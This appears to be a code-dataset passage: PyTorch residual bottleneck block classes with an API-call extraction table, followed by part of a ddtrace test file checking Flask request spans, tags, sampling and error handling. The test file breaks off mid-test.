depth (int): Output channels.
stride (int): Conv2d stride.
"""
def __init__(self, in_channel, depth, stride):
"""Intermediate Resblock of bottleneck.
Args:
in_channel (int): Input channels.
depth (int): Output channels.
stride (int): Conv2d stride.
"""
super(bottleneck_IR, self).__init__()
if in_channel == depth:
self.shortcut_layer = MaxPool2d(1, stride)
else:
self.shortcut_layer = Sequential(
Conv2d(in_channel, depth, (1, 1), stride, bias=False),
BatchNorm2d(depth))
self.res_layer = Sequential(
BatchNorm2d(in_channel),
Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),
PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False),
BatchNorm2d(depth))
def forward(self, x):
"""Forward function."""
shortcut = self.shortcut_layer(x)
res = self.res_layer(x)
return res + shortcut
class bottleneck_IR_SE(Module):
"""Intermediate Resblock of bottleneck with SEModule.
Args:
in_channel (int): Input channels.
depth (int): Output channels.
stride (int): Conv2d stride.
"""
def __init__(self, in_channel, depth, stride):
super(bottleneck_IR_SE, self).__init__()
if in_channel == depth:
self.shortcut_layer = MaxPool2d(1, stride)
else:
self.shortcut_layer = Sequential(
Conv2d(in_channel, depth, (1, 1), stride, bias=False),
BatchNorm2d(depth))
self.res_layer = Sequential(
BatchNorm2d(in_channel),
Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),
PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False),
BatchNorm2d(depth), SEModule(depth, 16))
def forward(self, x):
"""Forward function."""
shortcut = self.shortcut_layer(x)
res = self.res_layer(x)
return res + shortcut
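A quick shape check for the residual blocks (the 1x64x56x56 input below is an assumption for illustration, not taken from this file):
block = bottleneck_IR_SE(in_channel=64, depth=128, stride=2)
x = torch.randn(1, 64, 56, 56)  # one 64-channel 56x56 feature map
print(block(x).shape)  # expected: torch.Size([1, 128, 28, 28])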
| [
"torch.nn.Sigmoid",
"torch.nn.ReLU",
"collections.namedtuple",
"torch.nn.BatchNorm2d",
"torch.nn.Conv2d",
"torch.nn.PReLU",
"torch.norm",
"torch.nn.MaxPool2d",
"torch.nn.AdaptiveAvgPool2d",
"torch.div"
] | [((890, 944), 'collections.namedtuple', 'namedtuple', (['"""Block"""', "['in_channel', 'depth', 'stride']"], {}), "('Block', ['in_channel', 'depth', 'stride'])\n", (900, 944), False, 'from collections import namedtuple\n'), ((784, 816), 'torch.norm', 'torch.norm', (['input', '(2)', 'axis', '(True)'], {}), '(input, 2, axis, True)\n', (794, 816), False, 'import torch\n'), ((830, 852), 'torch.div', 'torch.div', (['input', 'norm'], {}), '(input, norm)\n', (839, 852), False, 'import torch\n'), ((3144, 3164), 'torch.nn.AdaptiveAvgPool2d', 'AdaptiveAvgPool2d', (['(1)'], {}), '(1)\n', (3161, 3164), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3184, 3261), 'torch.nn.Conv2d', 'Conv2d', (['channels', '(channels // reduction)'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels, channels // reduction, kernel_size=1, padding=0, bias=False)\n', (3190, 3261), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3343, 3361), 'torch.nn.ReLU', 'ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (3347, 3361), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3381, 3458), 'torch.nn.Conv2d', 'Conv2d', (['(channels // reduction)', 'channels'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels // reduction, channels, kernel_size=1, padding=0, bias=False)\n', (3387, 3458), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3543, 3552), 'torch.nn.Sigmoid', 'Sigmoid', ([], {}), '()\n', (3550, 3552), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4378, 4398), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\n', (4387, 4398), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4615, 4638), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\n', (4626, 4638), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4652, 4708), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\n', (4658, 4708), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4722, 4734), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\n', (4727, 4734), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4736, 4787), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\n', (4742, 4787), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4801, 4819), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (4812, 4819), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5379, 5399), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\n', (5388, 5399), False, 'from torch.nn import 
AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5616, 5639), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\n', (5627, 5639), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5653, 5709), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\n', (5659, 5709), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5723, 5735), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\n', (5728, 5735), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5737, 5788), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\n', (5743, 5788), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5802, 5820), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (5813, 5820), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4475, 4528), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\n', (4481, 4528), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4546, 4564), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (4557, 4564), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5476, 5529), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\n', (5482, 5529), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5547, 5565), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (5558, 5565), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n')] |
# -*- coding: utf-8 -*-
from ddtrace.compat import PY2
from ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY
from ddtrace.contrib.flask.patch import flask_version
from ddtrace.ext import http
from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID, HTTP_HEADER_PARENT_ID
from flask import abort
from . import BaseFlaskTestCase
from ...utils import assert_span_http_status_code
base_exception_name = 'builtins.Exception'
if PY2:
base_exception_name = 'exceptions.Exception'
class FlaskRequestTestCase(BaseFlaskTestCase):
def test_request(self):
"""
When making a request
We create the expected spans
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
res = self.client.get('/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
spans = self.get_spans()
self.assertEqual(len(spans), 8)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.index',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET /')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 0)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('flask.endpoint'), 'index')
self.assertEqual(req_span.get_tag('flask.url_rule'), '/')
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/')
assert_span_http_status_code(req_span, 200)
assert http.QUERY_STRING not in req_span.meta
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index')
self.assertEqual(handler_span.resource, '/')
self.assertEqual(req_span.error, 0)
def test_request_query_string_trace(self):
"""Make sure when making a request that we create the expected spans and capture the query string."""
@self.app.route('/')
def index():
return 'Hello Flask', 200
with self.override_http_config('flask', dict(trace_query_string=True)):
self.client.get('/?foo=bar&baz=biz')
spans = self.get_spans()
# Request tags
assert spans[0].get_tag(http.QUERY_STRING) == 'foo=bar&baz=biz'
def test_analytics_global_on_integration_default(self):
"""
When making a request
            When the integration event sample rate is not set and trace search is enabled globally
We expect the root span to have the appropriate tag
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
with self.override_global_config(dict(analytics_enabled=True)):
res = self.client.get('/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
root = self.get_root_span()
root.assert_matches(
name='flask.request',
metrics={
ANALYTICS_SAMPLE_RATE_KEY: 1.0,
},
)
for span in self.spans:
if span == root:
continue
self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
def test_analytics_global_on_integration_on(self):
"""
When making a request
When an integration trace search is enabled and sample rate is set and globally trace search is enabled
We expect the root span to have the appropriate tag
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
with self.override_global_config(dict(analytics_enabled=True)):
with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)):
res = self.client.get('/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
root = self.get_root_span()
root.assert_matches(
name='flask.request',
metrics={
ANALYTICS_SAMPLE_RATE_KEY: 0.5,
},
)
for span in self.spans:
if span == root:
continue
self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
def test_analytics_global_off_integration_default(self):
"""
When making a request
When an integration trace search is not set and sample rate is set and globally trace search is disabled
We expect the root span to not include tag
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
with self.override_global_config(dict(analytics_enabled=False)):
res = self.client.get('/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
root = self.get_root_span()
self.assertIsNone(root.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
for span in self.spans:
if span == root:
continue
self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
def test_analytics_global_off_integration_on(self):
"""
When making a request
When an integration trace search is enabled and sample rate is set and globally trace search is disabled
We expect the root span to have the appropriate tag
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
with self.override_global_config(dict(analytics_enabled=False)):
with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)):
res = self.client.get('/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
root = self.get_root_span()
root.assert_matches(
name='flask.request',
metrics={
ANALYTICS_SAMPLE_RATE_KEY: 0.5,
},
)
for span in self.spans:
if span == root:
continue
self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
def test_distributed_tracing(self):
"""
When making a request
When distributed tracing headers are present
We create the expected spans
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
# Default: distributed tracing enabled
res = self.client.get('/', headers={
HTTP_HEADER_PARENT_ID: '12345',
HTTP_HEADER_TRACE_ID: '678910',
})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
# Assert parent and trace id are properly set on the root span
span = self.find_span_by_name(self.get_spans(), 'flask.request')
self.assertEqual(span.trace_id, 678910)
self.assertEqual(span.parent_id, 12345)
# Explicitly enable distributed tracing
with self.override_config('flask', dict(distributed_tracing_enabled=True)):
res = self.client.get('/', headers={
HTTP_HEADER_PARENT_ID: '12345',
HTTP_HEADER_TRACE_ID: '678910',
})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
# Assert parent and trace id are properly set on the root span
span = self.find_span_by_name(self.get_spans(), 'flask.request')
self.assertEqual(span.trace_id, 678910)
self.assertEqual(span.parent_id, 12345)
# With distributed tracing disabled
with self.override_config('flask', dict(distributed_tracing_enabled=False)):
res = self.client.get('/', headers={
HTTP_HEADER_PARENT_ID: '12345',
HTTP_HEADER_TRACE_ID: '678910',
})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
# Assert parent and trace id are properly set on the root span
span = self.find_span_by_name(self.get_spans(), 'flask.request')
self.assertNotEqual(span.trace_id, 678910)
self.assertIsNone(span.parent_id)
def test_request_query_string(self):
"""
When making a request
When the request contains a query string
We create the expected spans
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
res = self.client.get('/', query_string=dict(hello='flask'))
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
spans = self.get_spans()
self.assertEqual(len(spans), 8)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.index',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
# Note: contains no query string
self.assertEqual(req_span.resource, 'GET /')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 0)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('flask.endpoint'), 'index')
# Note: contains no query string
self.assertEqual(req_span.get_tag('flask.url_rule'), '/')
self.assertEqual(req_span.get_tag('http.method'), 'GET')
# Note: contains no query string
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/')
assert_span_http_status_code(req_span, 200)
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index')
# Note: contains no query string
self.assertEqual(handler_span.resource, '/')
self.assertEqual(req_span.error, 0)
def test_request_unicode(self):
"""
When making a request
When the url contains unicode
We create the expected spans
"""
@self.app.route(u'/üŋïĉóđē')
def unicode():
return 'üŋïĉóđē', 200
res = self.client.get(u'/üŋïĉóđē')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'\xc3\xbc\xc5\x8b\xc3\xaf\xc4\x89\xc3\xb3\xc4\x91\xc4\x93')
spans = self.get_spans()
self.assertEqual(len(spans), 8)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.unicode',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, u'GET /üŋïĉóđē')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 0)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('flask.endpoint'), 'unicode')
self.assertEqual(req_span.get_tag('flask.url_rule'), u'/üŋïĉóđē')
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), u'http://localhost/üŋïĉóđē')
assert_span_http_status_code(req_span, 200)
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.unicode')
self.assertEqual(handler_span.resource, u'/üŋïĉóđē')
self.assertEqual(req_span.error, 0)
def test_request_404(self):
"""
When making a request
When the requested endpoint was not found
We create the expected spans
"""
res = self.client.get('/not-found')
self.assertEqual(res.status_code, 404)
spans = self.get_spans()
self.assertEqual(len(spans), 9)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'flask.handle_user_exception',
'flask.handle_http_exception',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET 404')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 0)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found')
assert_span_http_status_code(req_span, 404)
# Dispatch span
dispatch_span = spans[3]
self.assertEqual(dispatch_span.service, 'flask')
self.assertEqual(dispatch_span.name, 'flask.dispatch_request')
self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')
self.assertEqual(dispatch_span.error, 1)
self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found'))
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')
def test_request_abort_404(self):
"""
When making a request
When the requested endpoint calls `abort(404)`
We create the expected spans
"""
@self.app.route('/not-found')
def not_found():
abort(404)
res = self.client.get('/not-found')
self.assertEqual(res.status_code, 404)
spans = self.get_spans()
self.assertEqual(len(spans), 10)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.not_found',
'flask.handle_user_exception',
'flask.handle_http_exception',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET /not-found')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 0)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found')
assert_span_http_status_code(req_span, 404)
self.assertEqual(req_span.get_tag('flask.endpoint'), 'not_found')
self.assertEqual(req_span.get_tag('flask.url_rule'), '/not-found')
# Dispatch span
dispatch_span = spans[3]
self.assertEqual(dispatch_span.service, 'flask')
self.assertEqual(dispatch_span.name, 'flask.dispatch_request')
self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')
self.assertEqual(dispatch_span.error, 1)
self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found'))
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.not_found')
self.assertEqual(handler_span.resource, '/not-found')
self.assertEqual(handler_span.error, 1)
self.assertTrue(handler_span.get_tag('error.msg').startswith('404 Not Found'))
self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')
def test_request_500(self):
"""
When making a request
When the requested endpoint raises an exception
We create the expected spans
"""
@self.app.route('/500')
def fivehundred():
raise Exception('500 error')
res = self.client.get('/500')
self.assertEqual(res.status_code, 500)
spans = self.get_spans()
self.assertEqual(len(spans), 9)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.fivehundred',
'flask.handle_user_exception',
'flask.handle_exception',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET /500')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 1)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500')
assert_span_http_status_code(req_span, 500)
self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred')
self.assertEqual(req_span.get_tag('flask.url_rule'), '/500')
# Dispatch span
dispatch_span = spans[3]
self.assertEqual(dispatch_span.service, 'flask')
self.assertEqual(dispatch_span.name, 'flask.dispatch_request')
self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')
self.assertEqual(dispatch_span.error, 1)
self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name)
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundred')
self.assertEqual(handler_span.resource, '/500')
self.assertEqual(handler_span.error, 1)
self.assertTrue(handler_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(handler_span.get_tag('error.type'), base_exception_name)
# User exception span
user_ex_span = spans[5]
self.assertEqual(user_ex_span.service, 'flask')
self.assertEqual(user_ex_span.name, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.error, 1)
self.assertTrue(user_ex_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(user_ex_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(user_ex_span.get_tag('error.type'), base_exception_name)
def test_request_501(self):
"""
When making a request
When the requested endpoint calls `abort(501)`
We create the expected spans
"""
@self.app.route('/501')
def fivehundredone():
abort(501)
res = self.client.get('/501')
self.assertEqual(res.status_code, 501)
spans = self.get_spans()
self.assertEqual(len(spans), 10)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.fivehundredone',
'flask.handle_user_exception',
'flask.handle_http_exception',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET /501')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 1)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/501')
assert_span_http_status_code(req_span, 501)
self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundredone')
self.assertEqual(req_span.get_tag('flask.url_rule'), '/501')
# Dispatch span
dispatch_span = spans[3]
self.assertEqual(dispatch_span.service, 'flask')
self.assertEqual(dispatch_span.name, 'flask.dispatch_request')
self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')
self.assertEqual(dispatch_span.error, 1)
self.assertTrue(dispatch_span.get_tag('error.msg').startswith('501 Not Implemented'))
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotImplemented')
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundredone')
self.assertEqual(handler_span.resource, '/501')
self.assertEqual(handler_span.error, 1)
self.assertTrue(handler_span.get_tag('error.msg').startswith('501 Not Implemented'))
self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotImplemented')
# User exception span
user_ex_span = spans[5]
self.assertEqual(user_ex_span.service, 'flask')
self.assertEqual(user_ex_span.name, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.error, 0)
def test_request_error_handler(self):
"""
When making a request
When the requested endpoint raises an exception
We create the expected spans
"""
@self.app.errorhandler(500)
def error_handler(e):
return 'Whoops', 500
@self.app.route('/500')
def fivehundred():
raise Exception('500 error')
res = self.client.get('/500')
self.assertEqual(res.status_code, 500)
self.assertEqual(res.data, b'Whoops')
spans = self.get_spans()
if flask_version >= (0, 12, 0):
self.assertEqual(len(spans), 11)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.fivehundred',
'flask.handle_user_exception',
'flask.handle_exception',
'tests.contrib.flask.test_request.error_handler',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
else:
self.assertEqual(len(spans), 10)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.fivehundred',
'flask.handle_user_exception',
'flask.handle_exception',
'tests.contrib.flask.test_request.error_handler',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET /500')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 1)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500')
assert_span_http_status_code(req_span, 500)
self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred')
self.assertEqual(req_span.get_tag('flask.url_rule'), '/500')
# Dispatch span
dispatch_span = spans[3]
self.assertEqual(dispatch_span.service, 'flask')
self.assertEqual(dispatch_span.name, 'flask.dispatch_request')
self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')
self.assertEqual(dispatch_span.error, 1)
self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name)
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
